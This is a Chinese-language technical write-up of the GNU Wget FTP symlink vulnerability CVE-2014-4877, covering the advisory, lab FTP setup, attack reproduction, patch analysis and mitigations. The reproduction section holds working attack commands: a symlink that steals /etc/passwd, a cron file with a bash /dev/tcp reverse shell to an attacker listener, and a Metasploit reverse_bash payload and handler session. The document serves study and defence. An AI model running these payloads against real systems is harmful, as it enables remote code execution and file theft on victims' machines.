1. 漏洞基本描述
2. 漏洞带来的影响
3. 漏洞攻击场景重现
4. 漏洞的利用场景
5. 漏洞原理分析
6. 漏洞修复方案
7. 攻防思考

http://www.gnu.org/software/wget/manual/wget.html#Recursive-Download

Absolute path traversal vulnerability in GNU Wget before 1.16, when recursion is enabled, allows remote FTP servers to write to arbitrary files, and consequently execute arbitrary code, via a LIST response that references the same filename within two entries, one of which indicates that the filename is for a symlink.

A flaw was found in the way Wget handled symbolic links. A malicious FTP
server could allow Wget running in the mirror mode (using the '-m' command
line option) to write an arbitrary file to a location writable to by the
user running Wget, possibly leading to code execution. (CVE-2014-4877)

https://access.redhat.com/security/cve/CVE-2014-4877
http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html
https://bugzilla.redhat.com/show_bug.cgi?id=1139181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4877
https://rhn.redhat.com/errata/RHSA-2014-1764.html

1. Access Vector: Network exploitable
2. Access Complexity: Medium
3. Authentication: Not required to exploit
4. Impact Type: 1) Allows unauthorized disclosure of information2) Allows unauthorized modification3) Allows disruption of service

1. gnu:wget:1.13
2. gnu:wget:1.13.4
3. gnu:wget:1.13.3
4. gnu:wget:1.13.2
5. gnu:wget:1.13.1
6. gnu:wget:1.12
7. gnu:wget:1.14
8. gnu:wget:1.15 and previous versions

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877

1. 安装vsftpd
yum install vsftpd2. 配置防火墙: 将FTP所使用端口开放出去
vim /etc/sysconfig/iptables
在REJECT行之前添加如下代码
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 21 -j ACCEPT
service iptables restart3. 下面是添加ftpuser用户，设置根目录为/home/wwwroot/ftpuser,禁止此用户登录SSH的权限，并限制其访问其它目录
vim /etc/vsftpd/vsftpd.conf
chroot_list_enable=YES
# (default follows)
chroot_list_file=/etc/vsftpd/chroot_listuseradd -d /home/wwwroot/ftpuser -g ftp -s /sbin/nologin ftpuser
passwd ftpuser
111vim /etc/vsftpd/chroot_list
admin
test4. 配置PASV模式
vsftpd默认没有开启PASV模式，现在FTP只能通过PORT模式连接，要开启PASV默认需要通过下面的配置
vim /etc/vsftpd/vsftpd.conf
在末尾添加
pasv_enable=YES
pasv_min_port=40000
pasv_max_port=40080
pasv_promiscuous=YES5. 设置Selinux
setsebool -P ftp_home_dir=1
setsebool -P allow_ftpd_full_access=1   6. 重新启动vsftpd
service vsftpd restart

1. Installation
yum -y install vsftpd db4-utils2. Configuration
http://wiki.centos.org/HowTos/Chroot_Vsftpd_with_non-system_users?action=AttachFile&do=get&target=vsftpd_virtual_config.sh
根据提示添加用户名、密码
admin
111
http://wiki.centos.org/HowTos/Chroot_Vsftpd_with_non-system_users?action=AttachFile&do=get&target=vsftpd_virtualuser_add.sh3. 配置指定目录的权限
cd /var/ftp/virtual_users
chmod 755 admin

http://wiki.centos.org/HowTos/Chroot_Vsftpd_with_non-system_users
https://www.centos.bz/2011/03/centos-install-vsftpd-ftp-server/
http://www.cnblogs.com/xiongpq/p/3384759.html

1. FTP服务器端要做的事情只要是构造一个符号链接(软链接)(server)
2. 使用存在漏洞的wget的客户端向服务端请求以的递归模式下载这个符号链接文件(client)
3. 最终受到攻击的是client

cd /var/ftp/pub
ln -s /etc/passwd steal
ll

wget ftp://192.168.207.128/pub/steal -r

cd 192.168.207.128/pub/
ll
cat steal

cd /var/ftp/pub
ln -s /etc/cron.d/ steal
ll

cd /etc/cron.d/
cat>cronshell <<EOD
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell
EOD

# cat .listing
total 155
lrwxrwxrwx   1 root     root           33 Feb  7  2013 steal -> /etc/cron.d
drwxrwxr-x  15 root     root         4096 Feb  7  2013 steal

nc -n -vv -l -p 4444

wget –m ftp://192.168.207.128:21/pub 

1. 生成反连shell的payload代码
msfpayload cmd/unix/reverse_bash LHOST=192.168.207.128 LPORT=4444 R
0<&108-;exec 108<>/dev/tcp/192.168.207.128/4444;sh <&108 >&108 2>&1082. 写入cronshell
cat > cronshell << EOD
> PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
> * * * * * root bash -c '0<&108-;exec 108<>/dev/tcp/192.168.92.138/4444;sh <&108 >&108 2>&108'; rm -f /etc/cron.d/cronshell
> EOD3. 启动MSF
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf exploit(handler) > set LHOST 192.168.207.128
LHOST => 192.168.207.128
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run -j4. 等待客户端的wget请求
wget –m ftp://192.168.207.128:21
//随后，客户端执行的反连请求5. SHELL建立后，服务端通过网络，发送任意命令到客户端执行 

1. wget的这个配置漏洞wget在本地创建了一个指向/etc/cron.d/的符号链接
2. 又由于wget没有做好multiple file的合法性检测，导致它接受了ftp server返回的两个同名的steal文件，一个是指向/etc/cron.d的符号链接，另一个是其中包含reverse shell脚本的同名的目录文件
3. 这个同名文件的冲突导致的结果就是，当前系统被错误的"欺骗"为自己的/etc/cron.d就是ftp server返回的那个其中包含有reverse shell的目录
4. /etc/cron.d代表着crontab定时器的执行目录，随后，系统按照ftp server指定的/etc/cron.d中的reverse shell进行指令执行，最终导致getshell

https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access
http://www.oschina.net/news/56518/wget-cve-2014-4877
http://bobao.360.cn/learning/detail/66.html

1. server FTP1) 黑客可以在自己的服务器上假设ftp，然后通过APT方式引诱受害者访问指定的ftp wget download url2) 黑客可以通过直接攻击一些流量较大的ftp下载站，替换掉原来正常提供下载的某些程序，从而让受害者在不知不觉中被GETSHELL2. client wget
对于客户端的要求就是wget要存在这个CVE漏洞

http://git.savannah.gnu.org/cgit/wget.git/snapshot/wget-1.16.tar.gz

2014-09-08  Darshit Shah  <darnir@gmail.com>* wget.texi (symbolic links): Update documentation of retr-symlinks toreflect the new default. Add warning about potential security issues with--retr-symlinks=yes.

By default, when retrieving @sc{ftp} directories recursively and a symbolic link
is encountered, the symbolic link is traversed and the pointed-to files are
retrieved.  Currently, Wget does not traverse symbolic links to directories to
download them recursively, though this feature may be added in the future.When @samp{--retr-symlinks=no} is specified, the linked-to file is not
downloaded.  Instead, a matching symbolic link is created on the local
filesystem.  The pointed-to file will not be retrieved unless this recursive
retrieval would have encountered it separately and downloaded it anyway.  This
option poses a security risk where a malicious FTP Server may cause Wget to
write to files outside of the intended directories through a specially crafted
@sc{.listing} file.

2014-09-08  Darshit Shah  <darnir@gmail.com>* init.c (defaults): Set retr-symlinks to true by default. This changes adefault setting of wget. Fixes security bug CVE-2014-4877

/* 2014-09-07  Darshit Shah  <darnir@gmail.com>* opt.retr_symlinks is set to true by default. Creating symbolic links on the* local filesystem pose a security threat by malicious FTP Servers that* server a specially crafted .listing file akin to this:** lrwxrwxrwx   1 root     root           33 Dec 25  2012 JoCxl6d8rFU -> /* drwxrwxr-x  15 1024     106          4096 Aug 28 02:02 JoCxl6d8rFU** A .listing file in this fashion makes Wget susceptiple to a symlink attack* wherein the attacker is able to create arbitrary files, directories and* symbolic links on the target system and even set permissions.** Hence, by default Wget attempts to retrieve the pointed-to files and does* not create the symbolic links locally.*/opt.retr_symlinks = true;

2014-09-08  Darshit Shah  <darnir@gmail.com>* ftp.c (ftp_retrieve_glob): Also check for invalid entries along withharmful filenames(is_valid_entry): New function. Check if the provided node is a valid entryin a listing file.

/* Test if the file node is invalid. This can occur due to malformed or* maliciously crafted listing files being returned by the server.** Currently, this function only tests if there are multiple entries in the* listing file by the same name. However this function can be expanded as more* such illegal listing formats are discovered. */
static bool
is_invalid_entry (struct fileinfo *f)
{struct fileinfo *cur;cur = f;char *f_name = f->name;/* If the node we're currently checking has a duplicate later, we eliminate* the current node and leave the next one intact. */while (cur->next){cur = cur->next;if (strcmp(f_name, cur->name) == 0)return true;}return false;
}

/* A near-top-level function to retrieve the files in a directory.The function calls ftp_get_listing, to get a linked list of files.Then it weeds out the file names that do not match the pattern.ftp_retrieve_list is called with this updated list as an argument.If the argument ACTION is GLOB_GETONE, just download the file (butfirst get the listing, so that the time-stamp is heeded); if it'sGLOB_GLOBALL, use globbing; if it's GLOB_GETALL, download the wholedirectory.  */
static uerr_t
ftp_retrieve_glob (struct url *u, ccon *con, int action)
{struct fileinfo *f, *start;uerr_t res;con->cmd |= LEAVE_PENDING;res = ftp_get_listing (u, con, &start);if (res != RETROK)return res;/* First: weed out that do not conform the global rules given inopt.accepts and opt.rejects.  */if (opt.accepts || opt.rejects){f = start;while (f){if (f->type != FT_DIRECTORY && !acceptable (f->name)){logprintf (LOG_VERBOSE, _("Rejecting %s.\n"),quote (f->name));f = delelement (f, &start);}elsef = f->next;}}/* Remove all files with possible harmful names or invalid entries. */f = start;while (f){/*这里增加了is_invalid_entry()对ftp server返回的.listing进行了强制检查*/if (has_insecure_name_p (f->name) || is_invalid_entry (f)){logprintf (LOG_VERBOSE, _("Rejecting %s.\n"),quote (f->name));f = delelement (f, &start);}......

1. wget的这个symbolic recursively file download是wget的一个功能的开关，是一个程序设计上的逻辑问题
2. 在老的存在漏洞的wget上，默认"--retr-symlinks=no"，即当wget客户端需要递归下载一个符号链接文件的时候，wget客户端并不会去真正下载这个符号链接对应的文件，而是在本地创建一个同名的、指向相同节点的符号链接
3. 而patch code、修复后的新版本所做的事情，就是将"--retr-symlinks=yes"设为默认值，即当wget客户端需要递归下载一个符号链接文件的时候，wget会去下载这个符号链接所指向的真正的文件，而不是在本地创建符号链接
4. 增加了is_invalid_entry()对ftp server返回的.listing进行了强制检查，防止出现重名的文件的现象

Wget was susceptible to a symlink attack which could create arbitrary
files, directories or symbolic links and set their permissions when
retrieving a directory recursively through FTP. This commit changes the
default settings in Wget such that Wget no longer creates local symbolic
links, but rather traverses them and retrieves the pointed-to file in
such a retrieval.

When Wget retrieves a file through FTP, it first downloads a .listing
file and parses it for information about the files and other metadata.
Some servers may serve invalid .listing files. This patch checks for one
such known inconsistency wherein multiple lines in a listing file have
the same name. Such a filesystem is clearly not possible and hence we
eliminate duplicate entries here.

http://git.savannah.gnu.org/cgit/wget.git/commit/?id=18b0979357ed7dc4e11d4f2b1d7e0f5932d82aa7
http://git.savannah.gnu.org/cgit/wget.git/commit/?id=69c45cba4382fcaabe3d86876bd5463dc34f442c
http://git.savannah.gnu.org/cgit/wget.git/
http://lists.gnu.org/archive/html/bug-wget/2014-10/msg00150.html
https://bugzilla.redhat.com/show_bug.cgi?id=1139181
https://bugzilla.redhat.com/attachment.cgi?id=935576

vim /etc/wgetrc
or
vim ~/.wgetrc//在最后增加一行
retr-symlinks=on 

升级至1.16 ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz